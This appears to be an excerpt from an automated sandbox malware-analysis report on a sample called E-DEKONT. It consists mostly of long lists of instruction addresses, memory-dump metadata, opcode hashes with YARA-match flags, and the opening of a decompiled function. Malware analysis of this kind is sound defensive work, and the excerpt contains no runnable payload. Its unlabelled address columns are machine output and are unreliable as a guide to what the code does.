                                                                            0x00406f41
                                                                            0x00406f44
                                                                            0x00406f46
                                                                            0x00406f49
                                                                            0x00406f4c
                                                                            0x00406f66
                                                                            0x00406f66
                                                                            0x00406f69
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406f6f
                                                                            0x00406f6f
                                                                            0x00406f72
                                                                            0x00406f79
                                                                            0x00000000
                                                                            0x00406f79
                                                                            0x00406f4e
                                                                            0x00406f51
                                                                            0x00406f58
                                                                            0x00406f5b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406f81
                                                                            0x00406f81
                                                                            0x00406fa6
                                                                            0x00406fa6
                                                                            0x00406fa6
                                                                            0x00406fa8
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406f86
                                                                            0x00406f86
                                                                            0x00406f8a
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406f90
                                                                            0x00406f90
                                                                            0x00406f93
                                                                            0x00406f96
                                                                            0x00406f99
                                                                            0x00406f9b
                                                                            0x00406f9d
                                                                            0x00406fa0
                                                                            0x00406fa3
                                                                            0x00406fa3
                                                                            0x00406fa3
                                                                            0x00406faa
                                                                            0x00406fb2
                                                                            0x00406fb5
                                                                            0x00406fb8
                                                                            0x00406fba
                                                                            0x00406fbd
                                                                            0x00406fbd
                                                                            0x00406fbf
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406fc5
                                                                            0x00406fc5
                                                                            0x00406fc8
                                                                            0x00406fcd
                                                                            0x00406fcf
                                                                            0x00406fd5
                                                                            0x00406fd7
                                                                            0x00406fec
                                                                            0x00406fee
                                                                            0x00406fee
                                                                            0x00406fd9
                                                                            0x00406fdf
                                                                            0x00406fe1
                                                                            0x00406fe3
                                                                            0x00406fe3
                                                                            0x00406ff0
                                                                            0x00406ff4
                                                                            0x00406ff7
                                                                            0x00406ffd
                                                                            0x00406ffd
                                                                            0x00407000
                                                                            0x00407000
                                                                            0x00407000
                                                                            0x00407002
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407008
                                                                            0x00407008
                                                                            0x0040700e
                                                                            0x00407010
                                                                            0x00407035
                                                                            0x00407038
                                                                            0x0040703e
                                                                            0x00407043
                                                                            0x00407049
                                                                            0x0040704f
                                                                            0x00407051
                                                                            0x00407054
                                                                            0x0040705d
                                                                            0x00407063
                                                                            0x00407063
                                                                            0x00407056
                                                                            0x00407058
                                                                            0x0040705a
                                                                            0x0040705a
                                                                            0x00407065
                                                                            0x0040706b
                                                                            0x0040706d
                                                                            0x00407070
                                                                            0x00407072
                                                                            0x00407078
                                                                            0x0040707a
                                                                            0x0040707c
                                                                            0x0040707e
                                                                            0x00407080
                                                                            0x00407083
                                                                            0x0040708c
                                                                            0x0040708f
                                                                            0x0040708f
                                                                            0x00407085
                                                                            0x00407085
                                                                            0x00407088
                                                                            0x00407088
                                                                            0x00407083
                                                                            0x0040707a
                                                                            0x00407091
                                                                            0x00407093
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407093
                                                                            0x00407012
                                                                            0x00407012
                                                                            0x00407018
                                                                            0x0040701e
                                                                            0x00407020
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407022
                                                                            0x00407022
                                                                            0x00407024
                                                                            0x00407026
                                                                            0x0040702f
                                                                            0x0040702f
                                                                            0x00407028
                                                                            0x00407028
                                                                            0x0040702b
                                                                            0x0040702b
                                                                            0x00407031
                                                                            0x00407033
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407099
                                                                            0x00407099
                                                                            0x0040709e
                                                                            0x004070a0
                                                                            0x004070a1
                                                                            0x004070a2
                                                                            0x004070a3
                                                                            0x004070a9
                                                                            0x004070ac
                                                                            0x004070af
                                                                            0x004070b2
                                                                            0x004070b4
                                                                            0x004070ba
                                                                            0x004070ba
                                                                            0x004070bd
                                                                            0x004070bd
                                                                            0x004070bd
                                                                            0x004070bd
                                                                            0x004070c6
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004070cb
                                                                            0x004070cb
                                                                            0x004070ce
                                                                            0x004070d1
                                                                            0x004070d3
                                                                            0x0040716a
                                                                            0x0040716a
                                                                            0x0040716d
                                                                            0x0040716f
                                                                            0x00407170
                                                                            0x00407171
                                                                            0x00407174
                                                                            0x00000000
                                                                            0x00407174
                                                                            0x004070d9
                                                                            0x004070d9
                                                                            0x004070df
                                                                            0x004070e1
                                                                            0x00407106
                                                                            0x00407109
                                                                            0x0040710f
                                                                            0x00407114
                                                                            0x0040711a
                                                                            0x00407120
                                                                            0x00407122
                                                                            0x00407125
                                                                            0x0040712e
                                                                            0x00407134
                                                                            0x00407134
                                                                            0x00407127
                                                                            0x00407129
                                                                            0x0040712b
                                                                            0x0040712b
                                                                            0x00407136
                                                                            0x0040713c
                                                                            0x0040713e
                                                                            0x00407141
                                                                            0x00407143
                                                                            0x00407149
                                                                            0x0040714b
                                                                            0x0040714d
                                                                            0x0040714f
                                                                            0x00407151
                                                                            0x00407154
                                                                            0x0040715d
                                                                            0x00407160
                                                                            0x00407160
                                                                            0x00407156
                                                                            0x00407156
                                                                            0x00407159
                                                                            0x00407159
                                                                            0x00407154
                                                                            0x0040714b
                                                                            0x00407162
                                                                            0x00407164
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407164
                                                                            0x004070e3
                                                                            0x004070e3
                                                                            0x004070e9
                                                                            0x004070ef
                                                                            0x004070f1
                                                                            0x004070f2
                                                                            0x00000000
                                                                            0x0040717c
                                                                            0x0040717c
                                                                            0x0040717f
                                                                            0x00407181
                                                                            0x00407184
                                                                            0x00407187
                                                                            0x00407187
                                                                            0x00407187
                                                                            0x00407187
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406835
                                                                            0x00406819
                                                                            0x00000000
                                                                            0x0040681f
                                                                            0x00406822
                                                                            0x0040682c
                                                                            0x0040682f
                                                                            0x00406832
                                                                            0x00000000
                                                                            0x00406832
                                                                            0x00406819
                                                                            0x0040683d
                                                                            0x00406840
                                                                            0x00406844
                                                                            0x0040684e
                                                                            0x00406858
                                                                            0x0040685b
                                                                            0x00406861
                                                                            0x00406995
                                                                            0x00406997
                                                                            0x0040699d
                                                                            0x004069a0
                                                                            0x004069a3
                                                                            0x00000000
                                                                            0x004069a3
                                                                            0x00406867
                                                                            0x00406867
                                                                            0x00406868
                                                                            0x004068c0
                                                                            0x004068c0
                                                                            0x004068c7
                                                                            0x0040696d
                                                                            0x0040696d
                                                                            0x00406972
                                                                            0x00406975
                                                                            0x0040697a
                                                                            0x0040697d
                                                                            0x00406982
                                                                            0x00406985
                                                                            0x0040698a
                                                                            0x0040698d
                                                                            0x0040698d
                                                                            0x00000000
                                                                            0x004068cd
                                                                            0x004068cd
                                                                            0x004068cd
                                                                            0x004068cd
                                                                            0x004068d1
                                                                            0x004068d6
                                                                            0x004068d6
                                                                            0x004068d6
                                                                            0x004068db
                                                                            0x004068dd
                                                                            0x004068df
                                                                            0x004068e4
                                                                            0x004068ea
                                                                            0x004068ef
                                                                            0x004068f1
                                                                            0x004068f1
                                                                            0x004068e6
                                                                            0x004068e6
                                                                            0x004068e6
                                                                            0x004068e4
                                                                            0x004068f3
                                                                            0x004068f6
                                                                            0x004068f8
                                                                            0x004068fb
                                                                            0x004068fb
                                                                            0x0040692f
                                                                            0x00406934
                                                                            0x00406936
                                                                            0x00406937
                                                                            0x00406939
                                                                            0x0040693a
                                                                            0x0040693a
                                                                            0x0040693a
                                                                            0x00406962
                                                                            0x00406967
                                                                            0x00406967
                                                                            0x00000000
                                                                            0x00406967
                                                                            0x004068c7
                                                                            0x0040686a
                                                                            0x0040686a
                                                                            0x0040686b
                                                                            0x004068b5
                                                                            0x00000000
                                                                            0x004068b5
                                                                            0x0040686d
                                                                            0x0040686e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004069ca
                                                                            0x004069ca
                                                                            0x004069ca
                                                                            0x004069cd
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004069aa
                                                                            0x004069aa
                                                                            0x004069ae
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004069b4
                                                                            0x004069b4
                                                                            0x004069b7
                                                                            0x004069ba
                                                                            0x004069bf
                                                                            0x004069c1
                                                                            0x004069c4
                                                                            0x004069c7
                                                                            0x004069c7
                                                                            0x004069c7
                                                                            0x004069cf
                                                                            0x004069cf
                                                                            0x004069d2
                                                                            0x004069d4
                                                                            0x004069d9
                                                                            0x004069dc
                                                                            0x004069de
                                                                            0x004069e1
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004069e7
                                                                            0x004069e7
                                                                            0x004069e9
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004069ef
                                                                            0x004069ef
                                                                            0x004069f3
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004069f9
                                                                            0x004069f9
                                                                            0x004069fc
                                                                            0x004069fe
                                                                            0x00406a9c
                                                                            0x00406a9c
                                                                            0x00406a9f
                                                                            0x00406aa1
                                                                            0x00406aa1
                                                                            0x00406aa4
                                                                            0x00406aa7
                                                                            0x00406aa9
                                                                            0x00406aab
                                                                            0x00406aad
                                                                            0x00406aad
                                                                            0x00406ab6
                                                                            0x00406abb
                                                                            0x00406abe
                                                                            0x00406ac1
                                                                            0x00406ac4
                                                                            0x00406ac7
                                                                            0x00406ac7
                                                                            0x00406ac7
                                                                            0x00406aca
                                                                            0x00406ad0
                                                                            0x00406ad0
                                                                            0x00406ad6
                                                                            0x00406ad6
                                                                            0x00406ad6
                                                                            0x00000000
                                                                            0x00406aca
                                                                            0x00406a04
                                                                            0x00406a04
                                                                            0x00406a0a
                                                                            0x00406a0d
                                                                            0x00406a0f
                                                                            0x00406a3a
                                                                            0x00406a3d
                                                                            0x00406a43
                                                                            0x00406a48
                                                                            0x00406a4e
                                                                            0x00406a54
                                                                            0x00406a56
                                                                            0x00406a59
                                                                            0x00406a62
                                                                            0x00406a68
                                                                            0x00406a68
                                                                            0x00406a5b
                                                                            0x00406a5d
                                                                            0x00406a5f
                                                                            0x00406a5f
                                                                            0x00406a6a
                                                                            0x00406a70
                                                                            0x00406a73
                                                                            0x00406a75
                                                                            0x00406a77
                                                                            0x00406a7d
                                                                            0x00406a7f
                                                                            0x00406a81
                                                                            0x00406a84
                                                                            0x00406a8d
                                                                            0x00406a8d
                                                                            0x00406a8f
                                                                            0x00406a86
                                                                            0x00406a86
                                                                            0x00406a89
                                                                            0x00406a89
                                                                            0x00406a91
                                                                            0x00406a91
                                                                            0x00406a7f
                                                                            0x00406a94
                                                                            0x00406a96
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406a96
                                                                            0x00406a11
                                                                            0x00406a11
                                                                            0x00406a17
                                                                            0x00406a1d
                                                                            0x00406a1f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406a21
                                                                            0x00406a21
                                                                            0x00406a23
                                                                            0x00406a25
                                                                            0x00406a28
                                                                            0x00406a2f
                                                                            0x00406a2f
                                                                            0x00406a31
                                                                            0x00406a2a
                                                                            0x00406a2a
                                                                            0x00406a2c
                                                                            0x00406a2c
                                                                            0x00406a33
                                                                            0x00406a35
                                                                            0x00406a38
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406b3c
                                                                            0x00406b3f
                                                                            0x00406b42
                                                                            0x00406b48
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406d1f
                                                                            0x00406d1f
                                                                            0x00406d1f
                                                                            0x00406d22
                                                                            0x00406d25
                                                                            0x00406d27
                                                                            0x00406d2a
                                                                            0x00406d30
                                                                            0x00406d37
                                                                            0x00406d39
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406c0d
                                                                            0x00406c0d
                                                                            0x00406c35
                                                                            0x00406c35
                                                                            0x00406c35
                                                                            0x00406c37
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406c15
                                                                            0x00406c15
                                                                            0x00406c19
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406c1f
                                                                            0x00406c1f
                                                                            0x00406c22
                                                                            0x00406c25
                                                                            0x00406c28
                                                                            0x00406c2a
                                                                            0x00406c2c
                                                                            0x00406c2f
                                                                            0x00406c32
                                                                            0x00406c32
                                                                            0x00406c32
                                                                            0x00406c39
                                                                            0x00406c39
                                                                            0x00406c41
                                                                            0x00406c44
                                                                            0x00406c4a
                                                                            0x00406c4d
                                                                            0x00406c51
                                                                            0x00406c55
                                                                            0x00406c58
                                                                            0x00406c5b
                                                                            0x00406c73
                                                                            0x00406c73
                                                                            0x00406c76
                                                                            0x00406c84
                                                                            0x00406c87
                                                                            0x00406c78
                                                                            0x00406c78
                                                                            0x00406c7a
                                                                            0x00406c81
                                                                            0x00406c81
                                                                            0x00406cb0
                                                                            0x00406cb0
                                                                            0x00406cb0
                                                                            0x00406cb3
                                                                            0x00406cb5
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406c90
                                                                            0x00406c90
                                                                            0x00406c94
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406c9a
                                                                            0x00406c9a
                                                                            0x00406c9d
                                                                            0x00406ca0
                                                                            0x00406ca3
                                                                            0x00406ca5
                                                                            0x00406ca7
                                                                            0x00406caa
                                                                            0x00406cad
                                                                            0x00406cad
                                                                            0x00406cad
                                                                            0x00406cb7
                                                                            0x00406cb7
                                                                            0x00406cb9
                                                                            0x00406cbb
                                                                            0x00406cc6
                                                                            0x00406cc9
                                                                            0x00406ccc
                                                                            0x00406cce
                                                                            0x00406cd0
                                                                            0x00406cd2
                                                                            0x00406cd5
                                                                            0x00406cd8
                                                                            0x00406cdd
                                                                            0x00406ce0
                                                                            0x00406ce3
                                                                            0x00406ce6
                                                                            0x00406ced
                                                                            0x00406cf0
                                                                            0x00406cf2
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406cf8
                                                                            0x00406cf8
                                                                            0x00406cfc
                                                                            0x00406d0d
                                                                            0x00406d0d
                                                                            0x00406d0d
                                                                            0x00406d0f
                                                                            0x00406d0f
                                                                            0x00406d13
                                                                            0x00406d13
                                                                            0x00406d13
                                                                            0x00406d15
                                                                            0x00406d16
                                                                            0x00406d19
                                                                            0x00406d19
                                                                            0x00406d19
                                                                            0x00406d1c
                                                                            0x00000000
                                                                            0x00406d1c
                                                                            0x00406cfe
                                                                            0x00406cfe
                                                                            0x00406d01
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406d07
                                                                            0x00406d07
                                                                            0x00000000
                                                                            0x00406d07
                                                                            0x00406c5d
                                                                            0x00406c5d
                                                                            0x00406c5f
                                                                            0x00406c61
                                                                            0x00406c64
                                                                            0x00406c67
                                                                            0x00406c6b
                                                                            0x00406c6b
                                                                            0x00406d3f
                                                                            0x00406d3f
                                                                            0x00406d42
                                                                            0x00406d49
                                                                            0x00406d4d
                                                                            0x00406d4f
                                                                            0x00406d52
                                                                            0x00406d55
                                                                            0x00406d5a
                                                                            0x00406d5d
                                                                            0x00406d5f
                                                                            0x00406d60
                                                                            0x00406d63
                                                                            0x00406d6e
                                                                            0x00406d71
                                                                            0x00406d88
                                                                            0x00406d8d
                                                                            0x00406d94
                                                                            0x00406d99
                                                                            0x00406d9d
                                                                            0x00406d9f
                                                                            0x00406d9f
                                                                            0x00406d9f
                                                                            0x00406da2
                                                                            0x00406da4
                                                                            0x00000000
                                                                            0x00406daa
                                                                            0x00406daa
                                                                            0x00406dae
                                                                            0x00406db9
                                                                            0x00406dcc
                                                                            0x00406dd1
                                                                            0x00406dd6
                                                                            0x00406dd8
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406dde
                                                                            0x00406dde
                                                                            0x00406de1
                                                                            0x00406de3
                                                                            0x00406df1
                                                                            0x00406df1
                                                                            0x00406df4
                                                                            0x00406df4
                                                                            0x00406df7
                                                                            0x00406dfa
                                                                            0x00406dfd
                                                                            0x00406e00
                                                                            0x00406e03
                                                                            0x00406e06
                                                                            0x00000000
                                                                            0x00406e06
                                                                            0x00406de5
                                                                            0x00406de5
                                                                            0x00406deb
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406deb
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040718a
                                                                            0x0040718a
                                                                            0x00407190
                                                                            0x00407196
                                                                            0x0040719b
                                                                            0x004071a1
                                                                            0x004071a7
                                                                            0x004071a9
                                                                            0x004071ac
                                                                            0x004071b5
                                                                            0x004071bb
                                                                            0x004071bb
                                                                            0x004071ae
                                                                            0x004071b0
                                                                            0x004071b2
                                                                            0x004071b2
                                                                            0x004071bd
                                                                            0x004071bf
                                                                            0x004071c2
                                                                            0x004071fd
                                                                            0x004071fd
                                                                            0x00000000
                                                                            0x004071c4
                                                                            0x004071c4
                                                                            0x004071c4
                                                                            0x004071ca
                                                                            0x004071cd
                                                                            0x004071cf
                                                                            0x00407204
                                                                            0x00407206
                                                                            0x00000000
                                                                            0x00407206
                                                                            0x00000000
                                                                            0x004071cf
                                                                            0x00000000
                                                                            0x0040680e
                                                                            0x004071dc
                                                                            0x00000000
                                                                            0x004071dc
                                                                            0x00406bf0
                                                                            0x00406bf2
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406bf4
                                                                            0x00406bf4
                                                                            0x00406bf7
                                                                            0x00000000
                                                                            0x00406bf7
                                                                            0x00406b3c
                                                                            0x00406afd
                                                                            0x004071e1
                                                                            0x004071e4
                                                                            0x004071e6
                                                                            0x004071ef
                                                                            0x004071f5
                                                                            0x00000000

                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5a4ae33423394c5bea169515a796ff1213356ce6b05ba1201df3d6212e3a5333
                                                                            • Instruction ID: c2d777d08f91faa28cc29f4af1d325e94f95b1c5ec16d27d51274fd7273dd8ba
                                                                            • Opcode Fuzzy Hash: 5a4ae33423394c5bea169515a796ff1213356ce6b05ba1201df3d6212e3a5333
                                                                            • Instruction Fuzzy Hash: A4E18971A04709DFDB24CF59C880BAAB7F1EB44305F15852EE497AB2D1D778AA91CF04
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02B83A1C Relevance: .3, Instructions: 271COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_2b60000_E-DEKONT.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 73823a3969f7ed5bf644f12b40277b8c99ab435b3795f6f34b21f9b81fe81b76
                                                                            • Instruction ID: dfc852a37f472748b1ba45932cd7adc24463ba5969377bf3000a0f17d25eb075
                                                                            • Opcode Fuzzy Hash: 73823a3969f7ed5bf644f12b40277b8c99ab435b3795f6f34b21f9b81fe81b76
                                                                            • Instruction Fuzzy Hash: CF717AB50083839BD72A7A3994492F57BE79F131B4BE848AFC8C14EC4BCB2614C5C653
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02B6D49E Relevance: .2, Instructions: 250COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_2b60000_E-DEKONT.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8eee3bc0bff614a15713a62e9ffc46d135b4f242649d90880ff190769281bdfb
                                                                            • Instruction ID: 213a0dcb2628024174f74553963b1c82f91fd4ac8519e78d94f27425a70ba068
                                                                            • Opcode Fuzzy Hash: 8eee3bc0bff614a15713a62e9ffc46d135b4f242649d90880ff190769281bdfb
                                                                            • Instruction Fuzzy Hash: 6561A9B211C3875BD31BAA7A944A1F5BFD69F231B9BAC4CAFC4C44EC47C61250D6C292
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02B62348 Relevance: .2, Instructions: 197COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_2b60000_E-DEKONT.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5ccfd20586602d5da55ab756c2bfea9a3e3c41b6dee2f3e344442fbda3be43ce
                                                                            • Instruction ID: 36be3779e98c03406928ff98cda32fa470e415bdf12767501822dc970e29882d
                                                                            • Opcode Fuzzy Hash: 5ccfd20586602d5da55ab756c2bfea9a3e3c41b6dee2f3e344442fbda3be43ce
                                                                            • Instruction Fuzzy Hash: 5651E55961C3835BD72ABE2890552F1BBC74B231B97EC88AFD8CD4E94BDA1250C8C353
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02B6230C Relevance: .2, Instructions: 195COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_2b60000_E-DEKONT.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6c3db63d766609426dd1ea8412f76698c4d125557d8c94edf6470344168a5685
                                                                            • Instruction ID: b098727331e270d4924fae881777e5c555cb0e549d0e1c4ff51b321ca128dcdc
                                                                            • Opcode Fuzzy Hash: 6c3db63d766609426dd1ea8412f76698c4d125557d8c94edf6470344168a5685
                                                                            • Instruction Fuzzy Hash: 4E51E55961C3835BD72ABA2890552F1BBC74B231B97EC88EFD8CD4E94BDA1250C4C353
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02B69142 Relevance: .2, Instructions: 181COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_2b60000_E-DEKONT.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: dc46b4589aac2006b24e58e995c8e901668a92edc5df30213f9ac9cabdc06b97
                                                                            • Instruction ID: b892a4707adfb6d83f5993558ab6fd6001d6a87aee19bba7bff5f8c64c3a1038
                                                                            • Opcode Fuzzy Hash: dc46b4589aac2006b24e58e995c8e901668a92edc5df30213f9ac9cabdc06b97
                                                                            • Instruction Fuzzy Hash: 4B51B36611838267E72ABD2999092E57BC75FA31F5FEC896FC8C84E907C62250D8C253
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02B67E58 Relevance: .2, Instructions: 175COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_2b60000_E-DEKONT.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 85cc5a5b8b9e294b23f56c762ce6fd839b657d59141d191a787bbcb78bbdcd14
                                                                            • Instruction ID: be0a9486b522231ced003a0d716fd46d625f3f6955576761464d0746d35a6d3c
                                                                            • Opcode Fuzzy Hash: 85cc5a5b8b9e294b23f56c762ce6fd839b657d59141d191a787bbcb78bbdcd14
                                                                            • Instruction Fuzzy Hash: FF5115726042489BDB30AF29CE887DE77A7AF94740F56441ADC8CDB214D7354A85CB01
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02B62329 Relevance: .1, Instructions: 132COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_2b60000_E-DEKONT.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3d5ae78561e76f85786e1a4e4f5ea8b1d3d697c7b93b2d9bdd6730cc44c8256d
                                                                            • Instruction ID: fdd545cf8cb56624607e985561f351dc1a26a8709c30558234340401f68a0586
                                                                            • Opcode Fuzzy Hash: 3d5ae78561e76f85786e1a4e4f5ea8b1d3d697c7b93b2d9bdd6730cc44c8256d
                                                                            • Instruction Fuzzy Hash: 0B412B687143128FDB28BE34C5E17F6A7539F52248BA881EFECCE87295DB2185C5D702
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02B71135 Relevance: .1, Instructions: 89COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_2b60000_E-DEKONT.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 58c657e705f72169ec83f5c09a226d621e7c9f6b75c333912885e69e5c095c35
                                                                            • Instruction ID: 9260630fae195c7d948689cff4a6d73c900276ca20e6af330903923a7c7943b1
                                                                            • Opcode Fuzzy Hash: 58c657e705f72169ec83f5c09a226d621e7c9f6b75c333912885e69e5c095c35
                                                                            • Instruction Fuzzy Hash: ED21D0312592968FC71ACE7D98855C8BB70DF062347180AEDD9A8DF5DBD322804BCB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02B6842D Relevance: .0, Instructions: 15COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_2b60000_E-DEKONT.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 492b701f0bf26e7c6a10379255b8ff84daf65a9a34689d80c010bc01f4c95219
                                                                            • Instruction ID: 565ff0198f6cd0743e53477ab0dec481f6cb363375ca7b134c5fb088a38984ea
                                                                            • Opcode Fuzzy Hash: 492b701f0bf26e7c6a10379255b8ff84daf65a9a34689d80c010bc01f4c95219
                                                                            • Instruction Fuzzy Hash: CBC08C8F8042760EE6A21CBC6B0E37A08060FC5364F1D97902E4DF9A4AE84C8E8D0C99
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004043B4 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 204windowstringCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 91%
                                                                            			E004043B4(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t110;
